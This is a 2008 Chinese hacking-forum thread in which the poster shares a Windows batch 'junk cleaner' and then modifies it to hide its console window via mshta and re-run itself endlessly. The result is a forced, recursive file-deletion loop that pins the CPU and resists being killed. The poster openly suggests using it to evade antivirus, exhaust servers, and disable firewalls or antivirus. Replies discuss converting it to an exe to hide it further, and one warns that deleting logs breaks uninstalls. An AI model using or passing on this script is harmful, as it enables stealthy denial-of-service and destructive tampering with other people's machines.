【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 【原创】再谈垃圾清除的批处理和其流氓运用！ [打印本页]

作者: 平湖秋月 时间: 2008-9-13 23:51 标题: 【原创】再谈垃圾清除的批处理和其流氓运用！

大家经常会看到这个垃圾清除的的BAT程序，也就是很多人所说的30秒清除所有的系统他及程序说实话这个批处理效果确实不错，速度快而且不重不漏！系统这下减了不少肥。不过我觉得这个BAT还是有点不很完善，要是能够自动检测系统中的垃圾文件并且删除那该多好啊！7 _) |- h/ w0 ^( N1 E/ {+ a/ D
a.bat源代码如下：1 x  H5 f- z" w5 P( m! m

( j1 v9 m& O0 i* O1 o3 g) T* c* E. [, n- h
===可以直接保存改名a.bat=====================
8 v5 E' a3 r5 a$ r1 ~/ D6 K@echo off
0 o6 h, j4 t, i. w( E6 R5 B, C2 B: mecho 正在清除系统垃圾文件，请稍等......
6 i6 v6 ^. H  V) V% i  i5 ~+ b@del /f /s /q %systemdrive%\*.tmp
7 o& I9 t! N5 ?2 O- |+ n@del /f /s /q %systemdrive%\*._mp ( O% ]$ S  C- G: f) L
@del /f /s /q %systemdrive%\*.log
8 F% i: l0 [+ `% _; M@del /f /s /q %systemdrive%\*.gid
8 U$ j# [; p# d1 T1 l7 m! o@del /f /s /q %systemdrive%\*.chk 6 T7 N: d4 u9 ]# m6 x
@del /f /s /q %systemdrive%\*.old
$ Q! L: O3 M1 d( J1 B@del /f /s /q %systemdrive%\recycled\*.*
% a8 q# @) x% g' W& t@del /f /s /q %windir%\*.bak
, b4 Q- L. a" p4 b5 ~/ S4 H@del /f /s /q %windir%\prefetch\*.*
4 @) [% I! X: m$ K6 C: [6 x: \@rd /s /q %windir%\temp & md %windir%\temp
3 {) V- W2 n4 E! h- e" r/ [' D+ q@del /f /q %userprofile%\cookies\*.* 5 E( }& D. y. f9 G: f- c% ?7 H/ p0 q
@del /f /q %userprofile%\recent\*.* 4 E3 O6 r' i2 r: Y3 ^
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*" - u* P0 i% w( d& f8 B1 e
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
: a( m4 G8 M# w3 g' t! ~8 i7 K  `@del /f /s /q "%userprofile%\recent\*.*" . Q; I/ {  T$ w! u
echo 清除系统LJ完成！3 e  Q- R& R& X1 }. S/ C& ~
其实简单的一句话便实现了那个功能，在“echo 清除系统LJ完成！”后面加上一句 “call a.bat”就OK了，命令的意思大家都懂，我就不做解释了！我运行了一下，到是能够自动检测和删除了，而且关掉对话框也简单，直接关闭就行了！但是如果被当作入侵工具却又点太暴露，并且那个DOS框始终不能隐藏，很容易被发现.这该怎么办？想想批处理里面的命令，貌似没见到有隐藏对话框的用法（如果有请告诉指教一下！我的QQ：118122875），于是到网上找了一下，决定用VBS代码实现，于是又加上了下面的代码，其实也很简单，也就加了一句话进去：
' S6 _( K( j1 L7 |3 @' J/ l7 l
===可以直接保存改名为a.bat(一定要是a.bat哦具体说明原因你应该明白吧======
- {& R/ ^2 p0 R4 X/ Z- I@echo off. B$ j' A7 f9 r" s8 f/ d
if "%1" == "h" goto begin6 Q, k7 K8 U& t5 @0 E7 k# S2 L5 f
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
" p- ?. ]4 S- o4 k:begin
2 w- E, v0 s: S4 ]& h" p6 H  A- Becho 正在清除系统垃圾文件，请稍等...... " d) ?$ P  w( X( k
@@del /f /s /q %systemdrive%\*.tmp
0 {, i$ |' y4 i, e4 W@del /f /s /q %systemdrive%\*._mp
$ F! R$ m0 x0 _! Z+ X1 m/ `  ^@del /f /s /q %systemdrive%\*.log
! d' q. T( q) i! m# h@del /f /s /q %systemdrive%\*.gid . J9 J+ s& C) C( E6 {) K" A
@del /f /s /q %systemdrive%\*.chk
! j- l6 G5 {" g: d2 e( _2 k' x@del /f /s /q %systemdrive%\*.old " @- M, g, C7 F( j+ L. _
@del /f /s /q %systemdrive%\recycled\*.*
  {0 ~2 R1 Y* G. m$ T3 p' K@del /f /s /q %windir%\*.bak
6 H3 d- ?; [8 G  o- T- l@del /f /s /q %windir%\prefetch\*.*
" w, G$ c& Y4 c4 Q. t/ g@rd /s /q %windir%\temp & md %windir%\temp
1 ~4 h6 H1 i) M  q" a6 J" V  [* ~@del /f /q %userprofile%\cookies\*.* 1 q7 _0 `9 h6 W' |: o( a: t
@del /f /q %userprofile%\recent\*.* 4 ]8 C/ {. V- d
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*" 9 w7 d. B6 u! i- W+ e: ~
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
3 e* g9 t( a! X: L% s0 q$ Z6 z@del /f /s /q "%userprofile%\recent\*.*" 3 _/ U$ z1 x" b6 ^' C
echo 清除系统LJ完成！# [% ~' S$ z2 Q/ a# S! s
call a.bat, v. S9 X4 E2 A6 J% V
运行看看！什么效果？
对话框消失了！打开任务管理器查看显示CPU运用：100% 看进程里面cmd.exe占用CPU：99    本来想删除这个进程，但是哪晓得点右键准备去删除那个cmd.exe，没有想到不见了，然后仔细一看，其实cmd.exe没有不见，但是已经PID不一样了，也就表示一个循环已经进行完毕,还没等你来的结束进程就已经进入下一个循环，这时候有的朋友会想可以用taskkill命令来删除进程，但是PID几乎是每2秒换一次，你的速度有那么快？！目前我还没找到解决的办法（高手请指教），无赖只好重新启动...哎！其实这都是雕虫小技，只不过是最基础的东西，但是有的时候最简单的也是最要命的！7 _, F* u5 |" O3 H  ^( q+ T
* R- W' V- ?  k3 k) [
你说，我们可以利用这个BAT做些什么：
1 m; l8 o* o- `) U5 D
1.因为bat文件可以躲过杀软！这样利用它的无限循环启动一些你自己的程序，当然咯，重复的循环安装时没有必要的，我只是打个比方，你可以自己改动代码达到自己的目的！
2.它循环使用消耗资源，如果这样的程序多弄几个，全部启动.你说服务器会怎么样？& W  o* I/ h2 ~0 o
3.如果我把里面的删除垃圾文件的代码换成关闭防护墙/杀毒和开系统端口和服务的代码，那不是更好？当然这些应用都是我个人的一些分析，没有真正的实验过，我想一个可以成功的通过～不过，这个小东西还有个美中不足，cmd.exe在进程里面看得到，至于怎么隐藏，那就请各位高手指教了，在下刚刚接触批处理，莱鸟一个，有什么不对的地方和我联系啊！我的QQ：118122875 平湖秋月

作者: 上帝的爱 时间: 2008-9-14 05:03

想法非常不错

作者: 柔肠寸断 时间: 2008-9-14 17:34

打个岔，流氓的应用，呵呵

作者: 柔肠寸断 时间: 2008-9-14 17:38

现在来正经的回答下问题：3 M ]6 E3 B$ H: u0 r
1、在bat下隐藏对话框，可以使用一个参数的，但是我记不得了

2、可以将bat转换成exe格式的文件啊，使用bat2exe,下次我找到了就发出来哈

作者: 问道小生 时间: 2008-9-14 19:03

其实这个批处理还有一个问题，就是把log文件一律也作为垃圾处理了~~~
部分软件卸载是需要log文件的，删除了它，就会造成软件无法正常卸载，或者卸载不干净。因此，log文件并不是垃圾，不同软件计录的log文件有着不同的作用，有的甚至是非常重要的，不是可以随便删除的，例如：一张CD碟片就有一个log日志文件，它主要记录EAC对CD抓轨的各项参数。

作者: 平湖秋月 时间: 2008-9-15 21:43

楼上的你们说的都有道理理论上是成立的我有时间试试看

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)